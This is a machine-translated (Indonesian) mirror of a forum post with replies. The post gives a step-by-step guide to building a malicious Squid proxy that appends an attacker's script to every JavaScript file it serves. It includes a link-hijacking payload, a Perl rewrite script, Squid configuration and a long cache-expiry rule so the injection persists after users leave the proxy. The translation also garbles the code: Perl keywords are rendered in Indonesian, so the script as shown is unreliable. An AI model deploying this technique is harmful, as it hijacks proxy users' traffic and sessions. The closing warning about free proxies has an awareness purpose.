Artikel ini adalah artikel cermin dari terjemahan mesin, silakan klik di sini untuk melompat ke artikel aslinya.

Jaringan Pertanian Architect_Programmer_Code»Arsitek Teknologi Lainnya Serangan dan pertahanan yang aman Manfaatkan server proxy untuk membajak data pribadi pengguna
Melihat: 14819|Jawab: 3

[Komunikasi Aman] Manfaatkan server proxy untuk membajak data pribadi pengguna

[Salin tautan]
Diposting pada 19/01/2015 02.34.56 | | | |
Posting ini terakhir diedit oleh Mo Xiaowen pada 2015-6-7 23:19


Ini dapat dilakukan hanya dengan memodifikasi konfigurasi SQUID
Apa itu SQUID?
Squid adalah perangkat lunak yang menyimpan data Internet dalam cache, menerima permintaan unduhan dari pengguna, dan secara otomatis memproses data yang diunduh. Ketika pengguna ingin mengunduh beranda, ia dapat mengirim permintaan ke Squid, meminta Squid untuk mengunduhnya atas namanya, kemudian Squid terhubung ke situs web dan meminta beranda, lalu mengirimkan beranda ke pengguna sambil menyimpan cadangan, ketika pengguna lain mengajukan permohonan halaman yang sama, Squid langsung mengirimkan cadangan yang disimpan ke pengguna, sehingga pengguna merasa kecepatannya cukup cepat. Squid dapat memproksikan protokol seperti HTTP, FTP, GOPHER, SSL, dan WAIS, dan Squid dapat menanganinya secara otomatis, dan Anda dapat mengatur Squid sesuai dengan kebutuhan Anda untuk menyaring hal-hal yang tidak diinginkan.
Squid dapat bekerja di banyak sistem operasi, seperti AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, dll.
Pelaksanaannya sangat sederhana:
1. Instal Squid di satu server Linux.
2. Ubah kode server, masukkan sepotong kode kita ke semua javascrip yang ditransmisikan dan kirimkan.
3. Atur waktu cache file js kami yang dimodifikasi setinggi mungkin.
Metode ini juga berlaku untuk situs web dengan SSL yang diaktifkan, jika situs memuat sumber daya yang tidak aman (seperti jquery untuk situs HTTP), sebagian besar browser akan memberikan peringatan, tetapi hanya sedikit orang yang memperhatikan.
Chema mengatakan bahwa lebih dari 5.000 orang menggunakan proxynya beberapa hari setelah dia merilisnya, dan kebanyakan orang menggunakannya untuk melakukan hal-hal buruk, karena mereka menggunakan proxy, jadi mereka pikir itu anonim dan aman, tetapi mereka tidak pernah menyangka bahwa server proxy akan melakukan hal-hal buruk juga.
Buat server proxy berbahaya Anda
Jika Anda sudah memiliki server proxy Squid, Anda juga memerlukan server web seperti Apache.
Langkah 1 Buat Muatan
Saya menggunakan skrip sederhana sebagai demonstrasi untuk mengarahkan semua hyperlink ke situs web saya.
/etc/squid/payload.js

[mw_shl_code=javascrip hapus t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Langkah 2: Tulis skrip untuk menginfeksi semua file JS
/etc/squid/poison.pl
[mw_shl_code=perl,benar]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
sementara(<>)
{
  menggigit $_;
  jika($_ =- /(.*.js)/i)
  {
        $url = $1;
        sistem("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        sistem("chmod o+r /var/www/tmp/$pid-$count.js");
        sistem ("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        cetak "http://127.0.0.1:80/tmp/$pid-$count.js";
  }
  yang lain
  {
        cetak "$_";
  }
$count++;
}[/mw_shl_code]
Skrip ini menggunakan wget untuk mendapatkan javascrip asli halaman dan menghapus file t, kemudian menambahkan kode di /etc/squid/payload.js dan mengirim file yang dimodifikasi ke klien, sementara Anda perlu membuat direktori /var/www/tmp dan mengizinkan squid untuk menulis file di dalamnya. Direktori ini menyimpan file js yang dimodifikasi.


Langkah 3 Gabungkan skrip di atas dengan Squid
Tambahkan di /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Langkah 4 Buat cache tidak pernah gagal
/var/www/tmp/.htaccess
[mw_shl_code=html,true] kedaluwarsaaktif aktif
KedaluwarsaDefault "akses ditambah 3000 hari"[/mw_shl_code]
Ini akan memberi tahu Apache untuk memberinya waktu kedaluwarsa yang lama sampai pengguna membersihkan cache mereka.


Jika Anda menghubungkan proxy ini, mengklik hyperlink apa pun akan mengarahkan Anda ke situs web saya, dan cache akan tetap ada meskipun Anda tidak menggunakan proxy nanti. Saya baru saja menggunakan muatan non-agresif, dan dengan metode ini, peretas dapat melakukan lebih banyak hal. Jadi, ingatkan diri Anda dan teman untuk berhati-hati dalam menggunakan proxy gratis.





Mantan:Ribuan bahan transparan FLASH
Depan:Mesin Android transien iPhone dan iPad dalam hitungan menit (sangat mudah)

Pos terkait
Diposting pada 19/01/2015 08.48.45 |
Ya, semua data akses dapat dicegat oleh server proxy, termasuk kiriman pasca pengambilan, jadi bagaimana privasi dapat diucapkan?
Diposting pada 19/01/2015 09.53.53 |
Bisakah mereka mencegat cookie saya?
 Tuan tanah| Diposting pada 20/01/2015 14.36.06 |
Wu Soft Inquiry Group Diposting pada 2015-1-19 09:53
Bisakah mereka mencegat cookie saya?

Ya                                             
Sanggahan:
Semua perangkat lunak, materi pemrograman, atau artikel yang diterbitkan oleh Code Farmer Network hanya untuk tujuan pembelajaran dan penelitian; Konten di atas tidak boleh digunakan untuk tujuan komersial atau ilegal, jika tidak, pengguna akan menanggung semua konsekuensi. Informasi di situs ini berasal dari Internet, dan sengketa hak cipta tidak ada hubungannya dengan situs ini. Anda harus sepenuhnya menghapus konten di atas dari komputer Anda dalam waktu 24 jam setelah pengunduhan. Jika Anda menyukai program ini, harap dukung perangkat lunak asli, pembelian pendaftaran, dan dapatkan layanan asli yang lebih baik. Jika ada pelanggaran, silakan hubungi kami melalui email.
Mail To:help@itsvse.com